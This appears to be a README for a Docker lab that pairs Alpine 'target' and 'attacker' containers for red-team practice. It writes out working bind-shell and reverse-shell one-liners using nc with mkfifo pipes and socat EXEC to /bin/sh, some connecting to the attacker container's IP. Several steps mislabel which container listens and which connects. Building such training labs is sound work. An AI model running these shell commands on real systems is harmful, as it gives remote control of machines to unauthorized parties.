Wind010 / hacklab

Setup containers using Alpine Linux as target and attacker for red-team exercises.

• The target has an IP address of 172.24.0.2.
• The attacker has an IP address of 172.24.0.3.
• The target and attack have ports 5009 expoed for tcp and udp.
• Port 5010 is exposed on the target and port 5011 is exposed on attacker to the host.

The static IP address for the containers can be removed for nmap practice. Install aother tools as needed in the Dockerfile for each image.

Build and run the containers. They will stay running in the shell you're using.

docker-compose up

Open a new terminal and setup on target container:

docker exec -it target /bin/bash

Open a new terminal and setup on attacker container:

docker exec -it target /bin/bash

Have the attacker connect to the target.

Everybody's go-to. Instructions below are for the neutered netcat-openbsd version.

Manual

Setup listener target:

mkfifo f
nc -l -p 5009 0<f | /bin/bash > f 2>&1

On attacker container, connect to target:

nc 172.24.0.2 5009 -vvv

Socat is a better option since you can use history and encryption with tty. Target machine is likely going to have netcat installed, but once a shell session is establed, you can install other tools.

Find the target ip address and setup listener:

socat TCP-LISTEN:5009,reuseaddr,fork EXEC:/bin/sh,pty,stderr,setsid,sigint,sane

On attacker container interactive bash, connect to the target:

socat FILE:`tty`,raw,echo=0 TCP4:172.24.0.2:5009

Stop connection with exit on attacker.

Have the target connect to the attacker. Circumvents inbound firewall rules.

On the attacker setup listener:

rm -f f 2> /dev/null
mkfifo f
cat f | /bin/sh -i 2>&1 | nc 172.24.0.3 5009 > f

OR

nc 172.24.0.3 5009 0<f | /bin/sh -i 2>&1 | tee f

On target container interactive bash, connect to the attacker:

nc -lvnp 5009 -vvv

Setup listener on the attacker:

socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:5009

On target container interactive bash, connect to the attacker.:

socat TCP:172.24.0.3:5009 EXEC:'/bin/bash',pty,stderr,setsid,sigint,sane

Stop connection with exit on attacker.

On the docker-compose terminal press ctrl+c to stop the running containers.

docker-compose down

docker-compose --verbose up

Show running container IP addresse from host:

docker inspect -f '{{range.NetworkSettings.Networks}}{{.IPAddress}}{{end}}' <container_name>

Show IP address from running container:

hostname -i

List running procees:

ps

Kill specified process ID. You may need to do this for already running listeners.

kip <pid>

If you get connection refused, make sure your listener is running.

This is for educational purposes. Do not attack unauthorized systems.

• Generate reverse shell payloads